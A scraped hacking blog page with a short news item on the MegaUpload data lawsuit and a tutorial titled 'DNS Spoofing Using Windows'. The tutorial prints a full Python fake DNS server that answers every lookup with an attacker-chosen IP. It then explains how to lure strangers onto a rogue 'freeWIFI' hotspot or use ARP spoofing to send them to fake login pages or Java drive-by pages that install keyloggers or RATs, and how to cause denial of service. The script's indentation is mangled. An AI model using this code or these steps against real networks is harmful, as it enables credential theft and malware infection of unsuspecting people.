Sabtu, 06 Oktober 2012

egyhacks.net

egyhacks.net

MegaUpload Users Are One Step Closer to Getting Their Data Back

Posted: 05 Oct 2012 09:29 PM PDT



There's now some hope that MegaUpload users will get their data back, even though it's a slim one. At the very least, the lawsuit brought against the US government by one MegaUpload user is going forward as the judge in the case said that hearings were needed to decide who was responsible for the data and what to do with it.

 The Electronic Frontier Foundation filed a motion to get the data back in the name of one MegaUpload user, Kyle Goodwin, who lost many hours of sports footage he needed for his work.

The government, understandably, is waiving any responsibility and says users should talk to MegaUpload or Carpathia Hosting, the hosting company MegaUpload used before being taken down.

MegaUpload, the company, is pretty much dead and couldn't access the data even if it wanted to, since it's been seized by the US government and it has been able to pay the hosting bills, so going after MegaUpload would be pointless.

Suing Carpathia is equally pointless, it still wants to get paid for keeping over 1,000 servers on the sideline for nine months and can't hand over the data to anyone but MegaUpload, who owns it, due to privacy laws.

The judge is having a tough time determining who's to blame and how to proceed, which is why he's going ahead with evidentiary hearings, something the government tried to prevent.

"The Court stated today that it will hold a hearing to find out the details about Mr. Goodwin's property - where it is, what happened when the government denied him access to it, and whether and how he can get it back," the EFF wrote.

"The Court has asked Mr. Goodwin and the government to each propose a format for the hearing, which remains unscheduled at this point," it said.

Enjoy.......

DNS Spoofing Using Windows (Tutorial)

Posted: 05 Oct 2012 04:51 PM PDT



Hi all users, in today's post we'll learn what is DNS spoofing and how to do it, we have tried to do it as simple as we can. So lets get started. I believe people need to know how to do that cool stuff (dns spoof) using windows :)

 REQUIRES:
This tutorial will require you one or two wireless adapters (if not two, then one and a normal wired LAN-adapter), and you must have installed python on your computer. Furthermore you should have some kind of webserver on your computer, (any kind).

NEED TO KNOW:
When a computer wants to open a webpage for instance, it needs to know the webpage servers's IP address. It gets the IP address from the DNS server. A DNS server is a domain name server, i.e. it receives requests for domains and returns the correct IP address for that domain. After that process, the computer can connect to that server and request the webpage it wants.

 So when your computer wants to open up http://www.google.com, it sends a request to a dns server, and the answer it gets is the IP address that belong to google.com. Every LAN has a DNS server, and usually the wireless access point acts as a DNS server, but a computer can also use a DNS server that is outside the LAN.

 WHAT WILL WE BE DOING?:
We will be running a python script that acts as a DNS server, but the script will return the IP address that you set it to return, no matter what domain is requested.

 I do not take credit for the script, I am only telling how to use it. The python script we will be using is from code.activestate.com

import socket

 class DNSQuery:
  def __init__(self, data):
    self.data=data
    self.dominio=''

     tipo = (ord(data[2]) >> 3) & 15   # Opcode bits
    if tipo == 0:  # Standard query
  ini=12
  lon=ord(data[ini])
  while lon != 0:
  self.dominio+=data[ini+1:ini+lon+1]+'.'
  ini+=lon+1
  lon=ord(data[ini])

   def respuesta(self, ip):
    packet=''
    if self.dominio:
  #print self.dominio
  packet+=self.data[:2] + "\x81\x80"
  packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'   # Questions and Answers Counts
  packet+=self.data[12:]  # Original Domain Name Question
  packet+='\xc0\x0c'  # Pointer to domain name
  packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'  # Response type, ttl and resource data length -> 4 bytes
  packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # 4bytes of IP
    return packet

 if __name__ == '__main__':
  ip='INSERT_YOUR_OWN_IP_HERE'
  print 'pyminifakeDNS:: dom.query. 60 IN A %s' % ip

   udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  udps.bind(('',53))

   try:
    while 1:
  data, addr = udps.recvfrom(1024)
  p=DNSQuery(data)
  #print p
  udps.sendto(p.respuesta(ip), addr)
  print 'Respuesta: %s -> %s' % (p.dominio, ip)
  except KeyboardInterrupt:
    print 'Finalizando'
    udps.close()


WHAT TO DO NEXT:
Insert "answer" IP in the script --> ip='INSERT_YOUR_OWN_IP_HERE' That IP is the one that your dns server will reply, no matter what domain is requested! (This is not the ip of the one you want to attack!)

Now the usage of this is quite obvious, and here are some examples : When you run the script, it will start acting as a real DNS-server.

One way to use it would be to set up an ad-hoc wi-fi network with internet sharing enabled, and you call the network by some nice name like "freeWIFI". Make sure that you are running the python script first, otherwise windows will make its own DNS-server and bind it to port 53! So if you are connected to some free access point (or a cabled LAN), you will be able to share that connection over your (other) wi-fi card. When somebody connects to your wi-fi and tries to open a webpage, any page, they get your page, that might contain a java drive-by, that installs a keylogger or RAT, or it could be a fake login-page of some kind.

This would require that you have 2 network cards, perhaps one wi-fi and one cabled, or two wi-fi cards. Basically you need to have a proper internet connection that is shared, and you will be sharing the internet connection to anyone who connects to your ad-hoc wi-fi network, but when they try to open a webpage, they will get your webpage instead.

NOTE : The webpage that is shown will always show the requested address in the address-bar, don't take my word for it, just test it!! It will not show the address of the real server that opened. If you write "www.google.com" it will open your webpage in stead, but still show "www.google.com" in the address bar. (just like using the HOSTS file to redirect i guess)

Make sure that the ip you set it to be, really does host some website, otherwise this will be just a DENIAL OF SERVICE, no connection etc. You could deliberately set the ip address to be "127.0.0.1" and make it a type of DENIAL OF SERVICE, since that would redirect any domain to localhost, so that could actually be another use.

if you do not already have a proper shareable internet connection, (maybe you only have one wi-fi card) and you are "on the go", in a shopping mall or a park, you would need to have a webserver installed locally on your pc, so that you could redirect all dns requested domains to your pc. You can use any webserver, apache for windows or hiawata (with php). You can host your java drive by locally, and infect other computers while on the go, without really having a real internet connection to share.

Another use would be if you are connected to someone elses wi-fi, and you can use arp-spoofing. Since the ones you are arp-spoofing assume that you are the network accesspoint, all DNS-requests will go to you, in stead of the real accesspoint.

I believe you get the point. There are many ways to have fun with this. I am actually developing a C# DNS-server with custom rewrites, that in contrary to the python script, actually returns the correct IP when it is not in the custom-rewrite list! But I will keep it to my self for now :)

 Enjoy.......
Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)